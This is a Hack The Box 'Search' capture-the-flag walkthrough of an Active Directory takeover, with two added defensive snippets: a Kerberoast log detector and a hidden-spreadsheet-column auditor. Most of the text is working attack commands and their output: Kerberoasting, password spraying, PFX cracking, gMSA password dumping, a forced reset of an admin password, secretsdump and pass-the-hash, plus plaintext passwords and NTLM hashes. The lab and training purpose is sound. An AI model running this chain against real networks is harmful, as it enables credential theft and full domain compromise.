Hack_The_Box_Writeups

HackTheBox – Search Walkthrough – In English

┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -T5 -sCV -p- 10.10.11.129 -Pn

┌──(root㉿kali)-[/home/kali/Downloads]
└─# gobuster dir -u http://search.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,sql,txt,wpad,xlsx,xml,aspx -t 64

http://search.htb/

http://search.htb/staff

http://search.htb/#about-section

http://search.htb/images/slide_2.jpg

Testing this set of credentials with crackmapexec, using the naming scheme identified earlier, we are able to authenticate to AD and list the shares on the machine.

┌──(root㉿kali)-[/home/kali/Downloads]
└─# crackmapexec smb search.htb -d search.htb -u hope.sharp -p 'IsolationIsKey?' --shares

┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //search.htb/RedirectedFolders$ -U Hope.Sharp

SPN crackable

Since nothing on this box is hunting us and we have user credentials, we can get a quick overview of the domain by collecting Active Directory data with bloodhound-python.

┌──(root㉿kali)-[/home/kali/Downloads/BloodHound.py]
└─# bloodhound-python -d search.htb -u hope.sharp -c All -p 'IsolationIsKey?' -ns 10.10.11.129

Now import the resulting files into BloodHound.

┌──(root㉿kali)-[/home/kali/Downloads]
└─# impacket-GetUserSPNs search.htb/hope.sharp:'IsolationIsKey?' -outputfile web_svc_kerberos

┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat web_svc_kerberos

┌──(root㉿kali)-[/home/kali/Downloads]
└─# john --wordlist=rockyou.txt web_svc_kerberos

Output:

@3ONEmillionbaby
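As an added example that is not part of the original writeup: a small detector a defender could run over Security-log 4769 (Kerberos service ticket requested) events to spot the pattern GetUserSPNs produces, namely RC4 (0x17) service tickets for user-backed SPNs. The log-line format and the sample lines, including the sql_svc and backup_svc SPNs, are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, simplified Security-log lines for Event ID 4769 (Kerberos service
# ticket requested). Not real log data; sql_svc and backup_svc are made-up SPNs.
SAMPLE_4769 = """\
2022-01-10T09:00:01 4769 account=hope.sharp@SEARCH.HTB service=RESEARCH$ enctype=0x12 status=0x0
2022-01-10T09:00:02 4769 account=hope.sharp@SEARCH.HTB service=krbtgt enctype=0x12 status=0x0
2022-01-10T09:05:10 4769 account=hope.sharp@SEARCH.HTB service=web_svc enctype=0x17 status=0x0
2022-01-10T09:05:11 4769 account=hope.sharp@SEARCH.HTB service=sql_svc enctype=0x17 status=0x0
2022-01-10T09:05:11 4769 account=hope.sharp@SEARCH.HTB service=backup_svc enctype=0x17 status=0x0
2022-01-10T11:30:00 4769 account=sierra.frye@SEARCH.HTB service=web_svc enctype=0x12 status=0x0
"""
LINE_RE = re.compile(r"^(?P<ts>\S+) 4769 account=(?P<account>\S+) service=(?P<service>\S+) "
                     r"enctype=(?P<enctype>0x[0-9a-f]+) status=(?P<status>0x[0-9a-f]+)$")

def parse_4769(text):
    """Parse the simplified 4769 lines into dicts with a datetime timestamp."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.fromisoformat(ev["ts"])
            events.append(ev)
    return events

def is_roastable(ev):
    # RC4-HMAC (0x17) tickets for user-backed SPNs are the classic Kerberoast
    # signature; machine accounts (name ends in $) and krbtgt are excluded.
    return (ev["enctype"] == "0x17" and ev["status"] == "0x0"
            and not ev["service"].endswith("$") and ev["service"].lower() != "krbtgt")

def detect_kerberoast(text, threshold=2, window=timedelta(minutes=5)):
    """Alert when one account requests RC4 tickets for `threshold` or more
    distinct user-backed SPNs within `window` (on an AES-only domain, use 1)."""
    by_account = defaultdict(list)
    for ev in parse_4769(text):
        if is_roastable(ev):
            by_account[ev["account"]].append(ev)
    alerts = []
    for account, evs in by_account.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):  # window anchored at each RC4 request
            services = {e["service"] for e in evs[i:] if e["ts"] - first["ts"] <= window}
            if len(services) >= threshold:
                alerts.append({"account": account, "services": sorted(services),
                               "start": first["ts"].isoformat()})
                break
    return alerts
```

The 0x12 requests from sierra.frye show why the encryption type matters: a normal AES ticket for the same SPN is not flagged, only the RC4 downgrade that cracking tools rely on.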

If we are lucky, this password is reused by a member of the HelpDesk group. We can list all recursive group members with BloodHound.

Running crackmapexec against that list of usernames, we can see that EDGAR.JACOBS probably reused his account password when creating web_svc.

┌──(root㉿kali)-[/home/kali/Downloads]
└─# crackmapexec smb search.htb -u helpdesk -p '@3ONEmillionbaby' --shares

Checking the user's home directory in the RedirectedFolders$ SMB share, we find an interesting-looking Excel file, Phishing_Attempt.xlsx.

┌──(root㉿kali)-[/home/kali/Downloads]
└─# /usr/share/doc/python3-impacket/examples/smbclient.py 'search.htb/EDGAR.JACOBS:@3ONEmillionbaby'@search.htb

# shares

# use RedirectedFolders$

# ls

# cd edgar.jacobs

# ls

# cd Desktop

# ls

# get Phishing_Attempt.xlsx

Copying everything with CTRL + A, CTRL + C and pasting it into a new file, we see that a hidden column contained the passwords for the usernames.
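As an added example (not the writeup's own code, and not the real Phishing_Attempt.xlsx): a stdlib-only audit that opens an .xlsx as a zip and reports hidden sheets and hidden columns together with their header text, so a reviewer can catch credential columns that are merely hidden before a workbook is shared. The sample workbook is constructed inline.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}

def build_sample_xlsx():
    """Constructed minimal workbook (not the box's Phishing_Attempt.xlsx): sheet1 has a
    'Password' header in hidden column C and sheet2 is a hidden sheet."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/workbook.xml", (
            '<workbook xmlns="%s"><sheets><sheet name="Users" sheetId="1"/>'
            '<sheet name="Notes" sheetId="2" state="hidden"/></sheets></workbook>') % NS["m"])
        z.writestr("xl/worksheets/sheet1.xml", (
            '<worksheet xmlns="%s"><cols><col min="3" max="3" width="0" hidden="1"/></cols>'
            '<sheetData><row r="1"><c r="A1" t="inlineStr"><is><t>User</t></is></c>'
            '<c r="C1" t="inlineStr"><is><t>Password</t></is></c></row></sheetData></worksheet>') % NS["m"])
        z.writestr("xl/worksheets/sheet2.xml", '<worksheet xmlns="%s"/>' % NS["m"])
    return buf.getvalue()

def col_letter(n):
    """1-based column index to Excel letters: 1 -> A, 27 -> AA."""
    s = ""
    while n:
        n, r = divmod(n - 1, 26)
        s = chr(65 + r) + s
    return s

def audit_hidden(xlsx_bytes):
    """Return (kind, location) findings for hidden sheets and hidden columns; each
    hidden column is reported with its row-1 header so the reviewer sees what it holds."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        wb = ET.fromstring(z.read("xl/workbook.xml"))
        for sh in wb.findall("m:sheets/m:sheet", NS):
            if sh.get("state") in ("hidden", "veryHidden"):
                findings.append(("hidden sheet", sh.get("name")))
        for name in sorted(n for n in z.namelist() if re.match(r"xl/worksheets/sheet\d+\.xml$", n)):
            ws = ET.fromstring(z.read(name))
            headers = {c.get("r"): "".join(c.itertext()).strip()
                       for c in ws.findall("m:sheetData/m:row[@r='1']/m:c", NS)}
            for col in ws.findall("m:cols/m:col", NS):  # Excel marks hidden cols with hidden="1" and/or width="0"
                if col.get("hidden") in ("1", "true") or col.get("width") == "0":
                    for idx in range(int(col.get("min")), int(col.get("max")) + 1):
                        letter = col_letter(idx)
                        findings.append(("hidden column", f"{name}:{letter} ({headers.get(letter + '1', '')})"))
    return findings
```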

Creds

┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat creds | awk -F' ' '{print $3}' > passwords

┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat creds | awk -F' ' '{print $4}' > users

┌──(root㉿kali)-[/home/kali/Downloads]
└─# crackmapexec smb search.htb -u users -p passwords -d search.htb --continue-on-success --no-bruteforce

This gives us:

SMB         search.htb      445    RESEARCH         [+] search.htb\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18

┌──(root㉿kali)-[/home/kali/Downloads]
└─# /usr/share/doc/python3-impacket/examples/smbclient.py 'search.htb/Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18'@search.htb

# use RedirectedFolders$

# cd sierra.frye

# cd Desktop

# ls

# get user.txt

┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //search.htb/RedirectedFolders$ -U Sierra.Frye

Password: $$49=wide=STRAIGHT=jordan=28$$18

smb: \> cd \sierra.frye\

smb: \sierra.frye\> ls

smb: \sierra.frye\> cd Downloads\

smb: \sierra.frye\Downloads\> ls

smb: \sierra.frye\Downloads\> cd Backups

smb: \sierra.frye\Downloads\Backups\> get search-RESEARCH-CA.p12

smb: \sierra.frye\Downloads\Backups\> get staff.pfx

A .p12 file is a PKCS#12 (Public Key Cryptography Standard #12) archive: a portable, password-protected container for a private key together with its certificate(s) and other sensitive material. It is used by many security and encryption programs and is also commonly called a "PFX file".

We can try importing this certificate into the browser (Firefox).

It asks for a password. We can try to crack the password using the tool below.

https://github.com/crackpkcs12/crackpkcs12

┌──(root㉿kali)-[/home/kali/Downloads/p12tool]
└─# go run cmd/main.go crack -c /home/kali/Downloads/staff.pfx -f /home/kali/Downloads/rockyou.txt

If you are running in a VM this will take considerably longer. Now we have the password for the certificate; let's import it into our browser.

There is a specific endpoint that you can access with this certificate.

https://search.htb/staff/en-US/logon.aspx

Now we need to enter the credentials of the 'Sierra' user to access the PowerShell console.

Password: misspissy

Username: Sierra.Frye
Password: $$49=wide=STRAIGHT=jordan=28$$18

Computer name: Research

┌──(root㉿kali)-[/home/kali/Downloads]
└─# bloodhound-python -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d search.htb -v --zip -c All,Loggedon -dc search.htb -ns 10.10.11.129

To get to Domain Admin we will go over multiple ways, the first two of which have probably been patched by now.

All of the ways start with reading the gMSA password of BIR-ADFS-GMSA$ as sierra.frye. This account in turn has GenericAll over Tristan.Davies, who is a member of the EA/DA/A groups.

As sierra.frye is a member of ITSEC, we can read the gMSA password.

BIR-ADFS-GMSA@SEARCH.HTB is a Group Managed Service Account. The group ITSEC@SEARCH.HTB can retrieve the password for the gMSA BIR-ADFS-GMSA@SEARCH.HTB.

https://github.com/micahvandeusen/gMSADumper

┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]
└─# ./gMSADumper.py -u sierra.frye -p '$$49=wide=STRAIGHT=jordan=28$$18' -l 10.10.11.129 -d search.htb

Output:

BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]
└─# impacket-psexec "BIR-ADFS-GMSA$"@search.htb -hashes :e1e9fd9e46d0d747e1595167eedcec0f

gMSAs use 240-byte, randomly generated complex passwords, so the hash is not practically crackable; the attributes below are what make the password readable to authorised principals instead.

msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword): stores the security principals that are allowed to retrieve the gMSA password.
msDS-ManagedPassword: contains a BLOB with the password information for a group managed service account.
msDS-ManagedPasswordId: a constructed attribute holding the key identifier for the current managed password data of a gMSA.
msDS-ManagedPasswordInterval: the number of days before the managed password of a gMSA is automatically changed.

Based on both blogs, we can run commands as BIR-ADFS-GMSA to set up an environment from which to reach domain admin. ConvertFrom-ADManagedPasswordBlob is provided by the DSInternals PowerShell module.

# GMSA
$gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA$' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
$secure = ConvertFrom-ADManagedPasswordBlob $mp

# Credentials
$username = "BIR-ADFS-GMSA"
$password = $secure.SecureCurrentPassword
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList $username, $password
Invoke-Command -ScriptBlock { whoami } -ComputerName RESEARCH -Credential $cred

Since BIR-ADFS-GMSA$ has GenericAll over Tristan.Davies, we can simply reset his password:

Invoke-Command -ScriptBlock { net user tristan.davies Password123! /domain } -ComputerName RESEARCH -Credential $cred

┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]
└─# crackmapexec smb search.htb -u tristan.davies -p 'Password123!' --shares

┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]
└─# impacket-secretsdump tristan.davies:'Password123!'@search.htb -just-dc-user Administrator

┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]
└─# impacket-wmiexec administrator@search.htb -hashes aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6

C:\>whoami

C:\>cd Users/Administrator/Desktop

C:\Users\Administrator\Desktop>dir

C:\Users\Administrator\Desktop>type root.txt

Hi, I'm saksham dixit
